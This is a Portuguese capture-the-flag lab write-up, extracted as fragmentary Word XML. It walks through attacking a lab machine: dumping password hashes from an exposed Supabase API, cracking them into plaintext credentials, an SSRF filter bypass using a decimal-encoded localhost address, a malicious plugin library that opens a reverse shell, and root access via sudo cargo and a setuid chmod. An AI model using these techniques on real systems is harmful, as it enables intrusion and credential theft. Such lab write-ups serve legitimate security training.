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sblqsykefzj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p9sn2nfz9dl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Extract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k2eg71evj87c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Iniciamos a enumeração da máquina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 Nmap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com o objetivo de identificar quais portas e serviços estavam expostos no alvo. A varredura permitiu mapear as portas abertas e serviu como base para as etapas seguintes de enumeração e exploração.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1988"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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9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varredura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as seguintes portas abertas na máquina alvo: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acesso seguro remoto.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servidor web.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54321, 54322, 54323, 54324, 54327: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serviços relacionados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possivelmente bancos de dados ou APIs associadas à plataforma.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7200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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 disponível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formulário de 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exigindo a inserção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e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acesso ao sistema.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70300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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54323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interface web do Supabase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serviços da plataforma estavam expostos externamente.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70200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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dessa interface, que se encontrava totalmente exposta, foi possível visualizar informações internas do banco de dados, incluindo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schemas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nomes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das tabelas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private_data e users.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40000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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 do Supabase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estava exposta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54321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tornou-se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consultar os dados diretamente pela API REST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caso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Row Level Security (RLS)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estivesse habilitado.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RLS (Row Level Security)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 mecanismo de controle de acesso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Supabase/PostgreSQL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permite definir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políticas de acesso a nível de linha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nas tabelas do banco de dados.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RLS ativo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cada consulta à tabela é filtrada de acordo com regras definidas (por exemplo, permitindo que cada usuário veja apenas suas próprias linhas). Se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estiver desativado, qualquer requisição à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pode acessar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todas as linhas da tabela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expondo informações sensíveis e aumentando o risco de vazamento de dados.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Row Level Security (RLS)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estava habilitado,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acessar integralmente os dados das tabelas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visualização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todas as informações armazenadas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qualquer tipo de restrição ou controle de acesso a nível de linha. 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http://&lt;machine-ip&gt;:54321/rest/v1/users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6163"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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hashes de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obtidas foram submetidas ao site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quebrar a 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recuperar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senha em texto claro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bem como identificar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do usuário kenaz.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kenaz:dominican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7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logar na aplicação web como usuário kenaz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10721"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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7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Inserimos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obtido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passando a utilizá-lo para autenticação e acesso às funcionalidades da aplicação.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9013"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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0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passamos a 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acesso à aplicação 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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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Analisando a aplicação, identificamos uma funcionalidade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Endpoint Health Check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verificar se um serviço está ativo. Por exemplo, utilizamos essa função para checar o status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serviço web na porta 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67100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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04625"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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6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serviço possui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filtros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impedem a verificação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portas internas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 web, limitando o acesso apenas a determinados serviços expostos.</w:t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Tentamos acessar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3306 (MySQL)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internamente na aplicação, mas o acesso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bloqueado pelos filtros do serviço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62625" cy="4781550"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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81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do filtro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testamos o endereço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127.0.0.1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representado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formato decimal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contornar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validações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aplicadas pelo Endpoint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Health Check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http://2130706433:3000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08538"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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5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bypass aplicado,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acessar a porta 3000 da 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estava sendo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executada apenas internamente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ficou caracterizada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falha de SSRF (Server-Side Request Forgery)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pois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forjar uma requisição legítima partindo do próprio servidor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acesso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endpoints internos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deveriam ser inacessíveis externamente.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22888"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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resposta da requisição, foi retornado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informando que o serviço em execução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3000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uma plataforma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monitoramento em tempo real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1863"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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8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foi possível acessar esse endpoint, que corresponde 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endpoint da API REST do Grafana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buscar e listar os dashboards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armazenados no sistema.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http://2130706433:3000/api/search?type=dash-db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08210"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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2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endpoint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private-users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os usuários do sistema, bem como obter as hashes de senhas associadas a esses usuários.</w:t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http://2130706433:3000/api/dashboards/uid/private-users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03229"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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187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Encontramos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bjorn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quebramos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da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usando o site </w:t>
      </w:r>
      <w:hyperlink r:id="rId29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CrackStation</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId30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bjorn:007007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13313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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35200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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credenciais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autenticar no serviço SSH da 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105400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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sdyly513um2y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7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com acesso remoto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utilizamos a ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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monitorar, em tempo real,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processos em execução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máquina, incluindo aqueles iniciados por outros usuários e por tarefas agendadas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(cron)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a necessidade de privilégios elevados.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o download do binário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pspy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máquina alvo, permitindo a execução da ferramenta localmente para monitorar, em tempo real, os processos e comandos executados no sistema. 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&lt;vpn-ip&gt;/pspy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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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 monitoramento dos processos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pspy,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service_loader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sendo executado a partir do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/opt/service_loader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associado ao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1002.</w:t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corresponde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astrid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máquina, indicando que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service_loader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executado no contexto deste usuário.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84200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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análise do binário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realizamos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transferência do arquivo para nossa máquina local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utilizamos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ferramenta de engenharia reversa, permitindo a inspeção do código, identificação de funções relevantes e compreensão do fluxo de execução do programa.</w:t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03400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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basta pressionar a tecla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utilizar o atalho de busca, localizar as funções disponíveis e, em seguida, selecionar a função principal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iniciar a análise do fluxo de execução do binário.</w:t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000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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selecionada, utilizamos o atalho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Ctrl + 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visualizar o código-fonte descompilado do binário, facilitando a análise da lógica, chamadas de funções e comportamento geral do programa.</w:t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Linha 17: Abre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/opt/v2/plugins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localizar plugins disponíveis.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Linha 26: Monta o caminho completo do arquivo de plugin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/opt/v2/plugins/arquivo.so).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Linha 27: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dlopen()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carregar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biblioteca .so na memória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Linha 28: Usa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dlsym()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procurar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plugin_init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da biblioteca carregada.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Linha 29: Executa a função encontrada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(plugin_init())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resumo, o binário implementa um sistema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plugins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dinâmicos, carregando bibliotecas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tempo de execução e executando automaticamente a função de inicialização definida nelas.</w:t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52900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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seja, esse binário carrega e executa automaticamente qualquer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.so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presente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/opt/v2/plugins.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comportamento nos permite inserir uma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maliciosa nesse diretório, que será carregada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dlopen()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terá sua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plugin_init()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executada, possibilitando a execução de código arbitrário no contexto do usuário que executa o binário.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 exploração, foi criado um arquivo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 (exploit.c)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define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plugin_init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qual utiliza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comandos no sistema e iniciar uma reverse shell.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&lt;fcntl.h&gt;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&lt;unistd.h&gt;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&lt;sys/stat.h&gt;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plugin_init(void)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7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compilado para gerar uma biblioteca compartilhada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(.so)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pode ser carregada dinamicamente pelo binário vulnerável durante a execução.</w:t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gcc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-fPIC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exploit.so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16000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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biblioteca gerada, ela foi copiada para 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/opt/v2/plugins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local onde o binário vulnerável busca os plugins. Assim,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automaticamente carregado e executado durante a execução do serviço.</w:t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/exploit.so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/opt/v2/plugins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11200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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aguardar a execução da biblioteca recém-criada,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recebemos com sucesso a conexão da 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a execução do código malicioso pelo binário vulnerável.</w:t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uma shell interativa associada a um terminal real, permitindo melhor controle da sessão, como uso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Ctrl+C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Ctrl+Z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autocompletar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execução correta de comandos interativos.</w:t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/home/astrid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53100" cy="942975"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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429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8l5s2i9ys2l6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com acesso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astrid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utilizamos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verificar quais comandos esse usuário pode executar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a necessidade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25400" l="25400" r="25400" t="2540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astrid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privilégio para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/root/.cargo/bin/cargo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necessidade de senha.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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Cargo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o gerenciador de projetos e dependências da linguagem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Rust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utilizado para compilar, executar e gerenciar aplicações escritas em Rust.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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esse binário, é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executar comandos como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criamos um novo projeto utilizando o Cargo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 execução de código durante o processo de build ou execução do projeto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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/root/.cargo/bin/cargo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47700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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projeto foi movido para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garantindo permissão de escrita no local e permitindo a manipulação dos arquivos necessários para a exploração.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projetct1/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/tmp/project1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alteramos o arquivo principal do projeto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main.rs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executar um comando como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adicionando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bit setuid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binário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que ele seja executado com privilégios elevados.</w:t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std::process::Command;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Command::new("bash").arg("-c").arg("chmod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u+s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.output()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.expect("fail");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println!("{}",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String::from_utf8_lossy(&amp;output.stdout));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fim,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basta executar o projeto criado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que o comando configurado seja executado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/root/.cargo/bin/cargo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obtivemos acesso root na máquina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concluindo a elevação de privilégios com sucesso.</w:t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54" w:type="default"/>
      <w:headerReference r:id="rId55" w:type="first"/>
      <w:headerReference r:id="rId56" w:type="even"/>
      <w:footerReference r:id="rId57" w:type="default"/>
      <w:footerReference r:id="rId58" w:type="first"/>
      <w:footerReference r:id="rId59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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ekcctamc9a7f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3" name="image40.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image4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2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2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Extract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20.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9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10.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28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laboratory/competition-machines/302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38.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DominicBreuker/pspy" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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0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4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8N+og2XS8/Tg+nEQyi072VeZ/A==">CgMxLjAyDmguc2JscXN5a2Vmemp1Mg5oLmRwOXNuMm5mejlkbDIOaC5rMmVnNzFldmo4N2MyDmguc2R5bHk1MTN1bTJ5Mg5oLjhsNXMyaTl5czJsNjIOaC5la2NjdGFtYzlhN2Y4AHIhMXNpNDVTeVREdXlRSWF6cFBHcW9CaWJyTXd3SHRnYURO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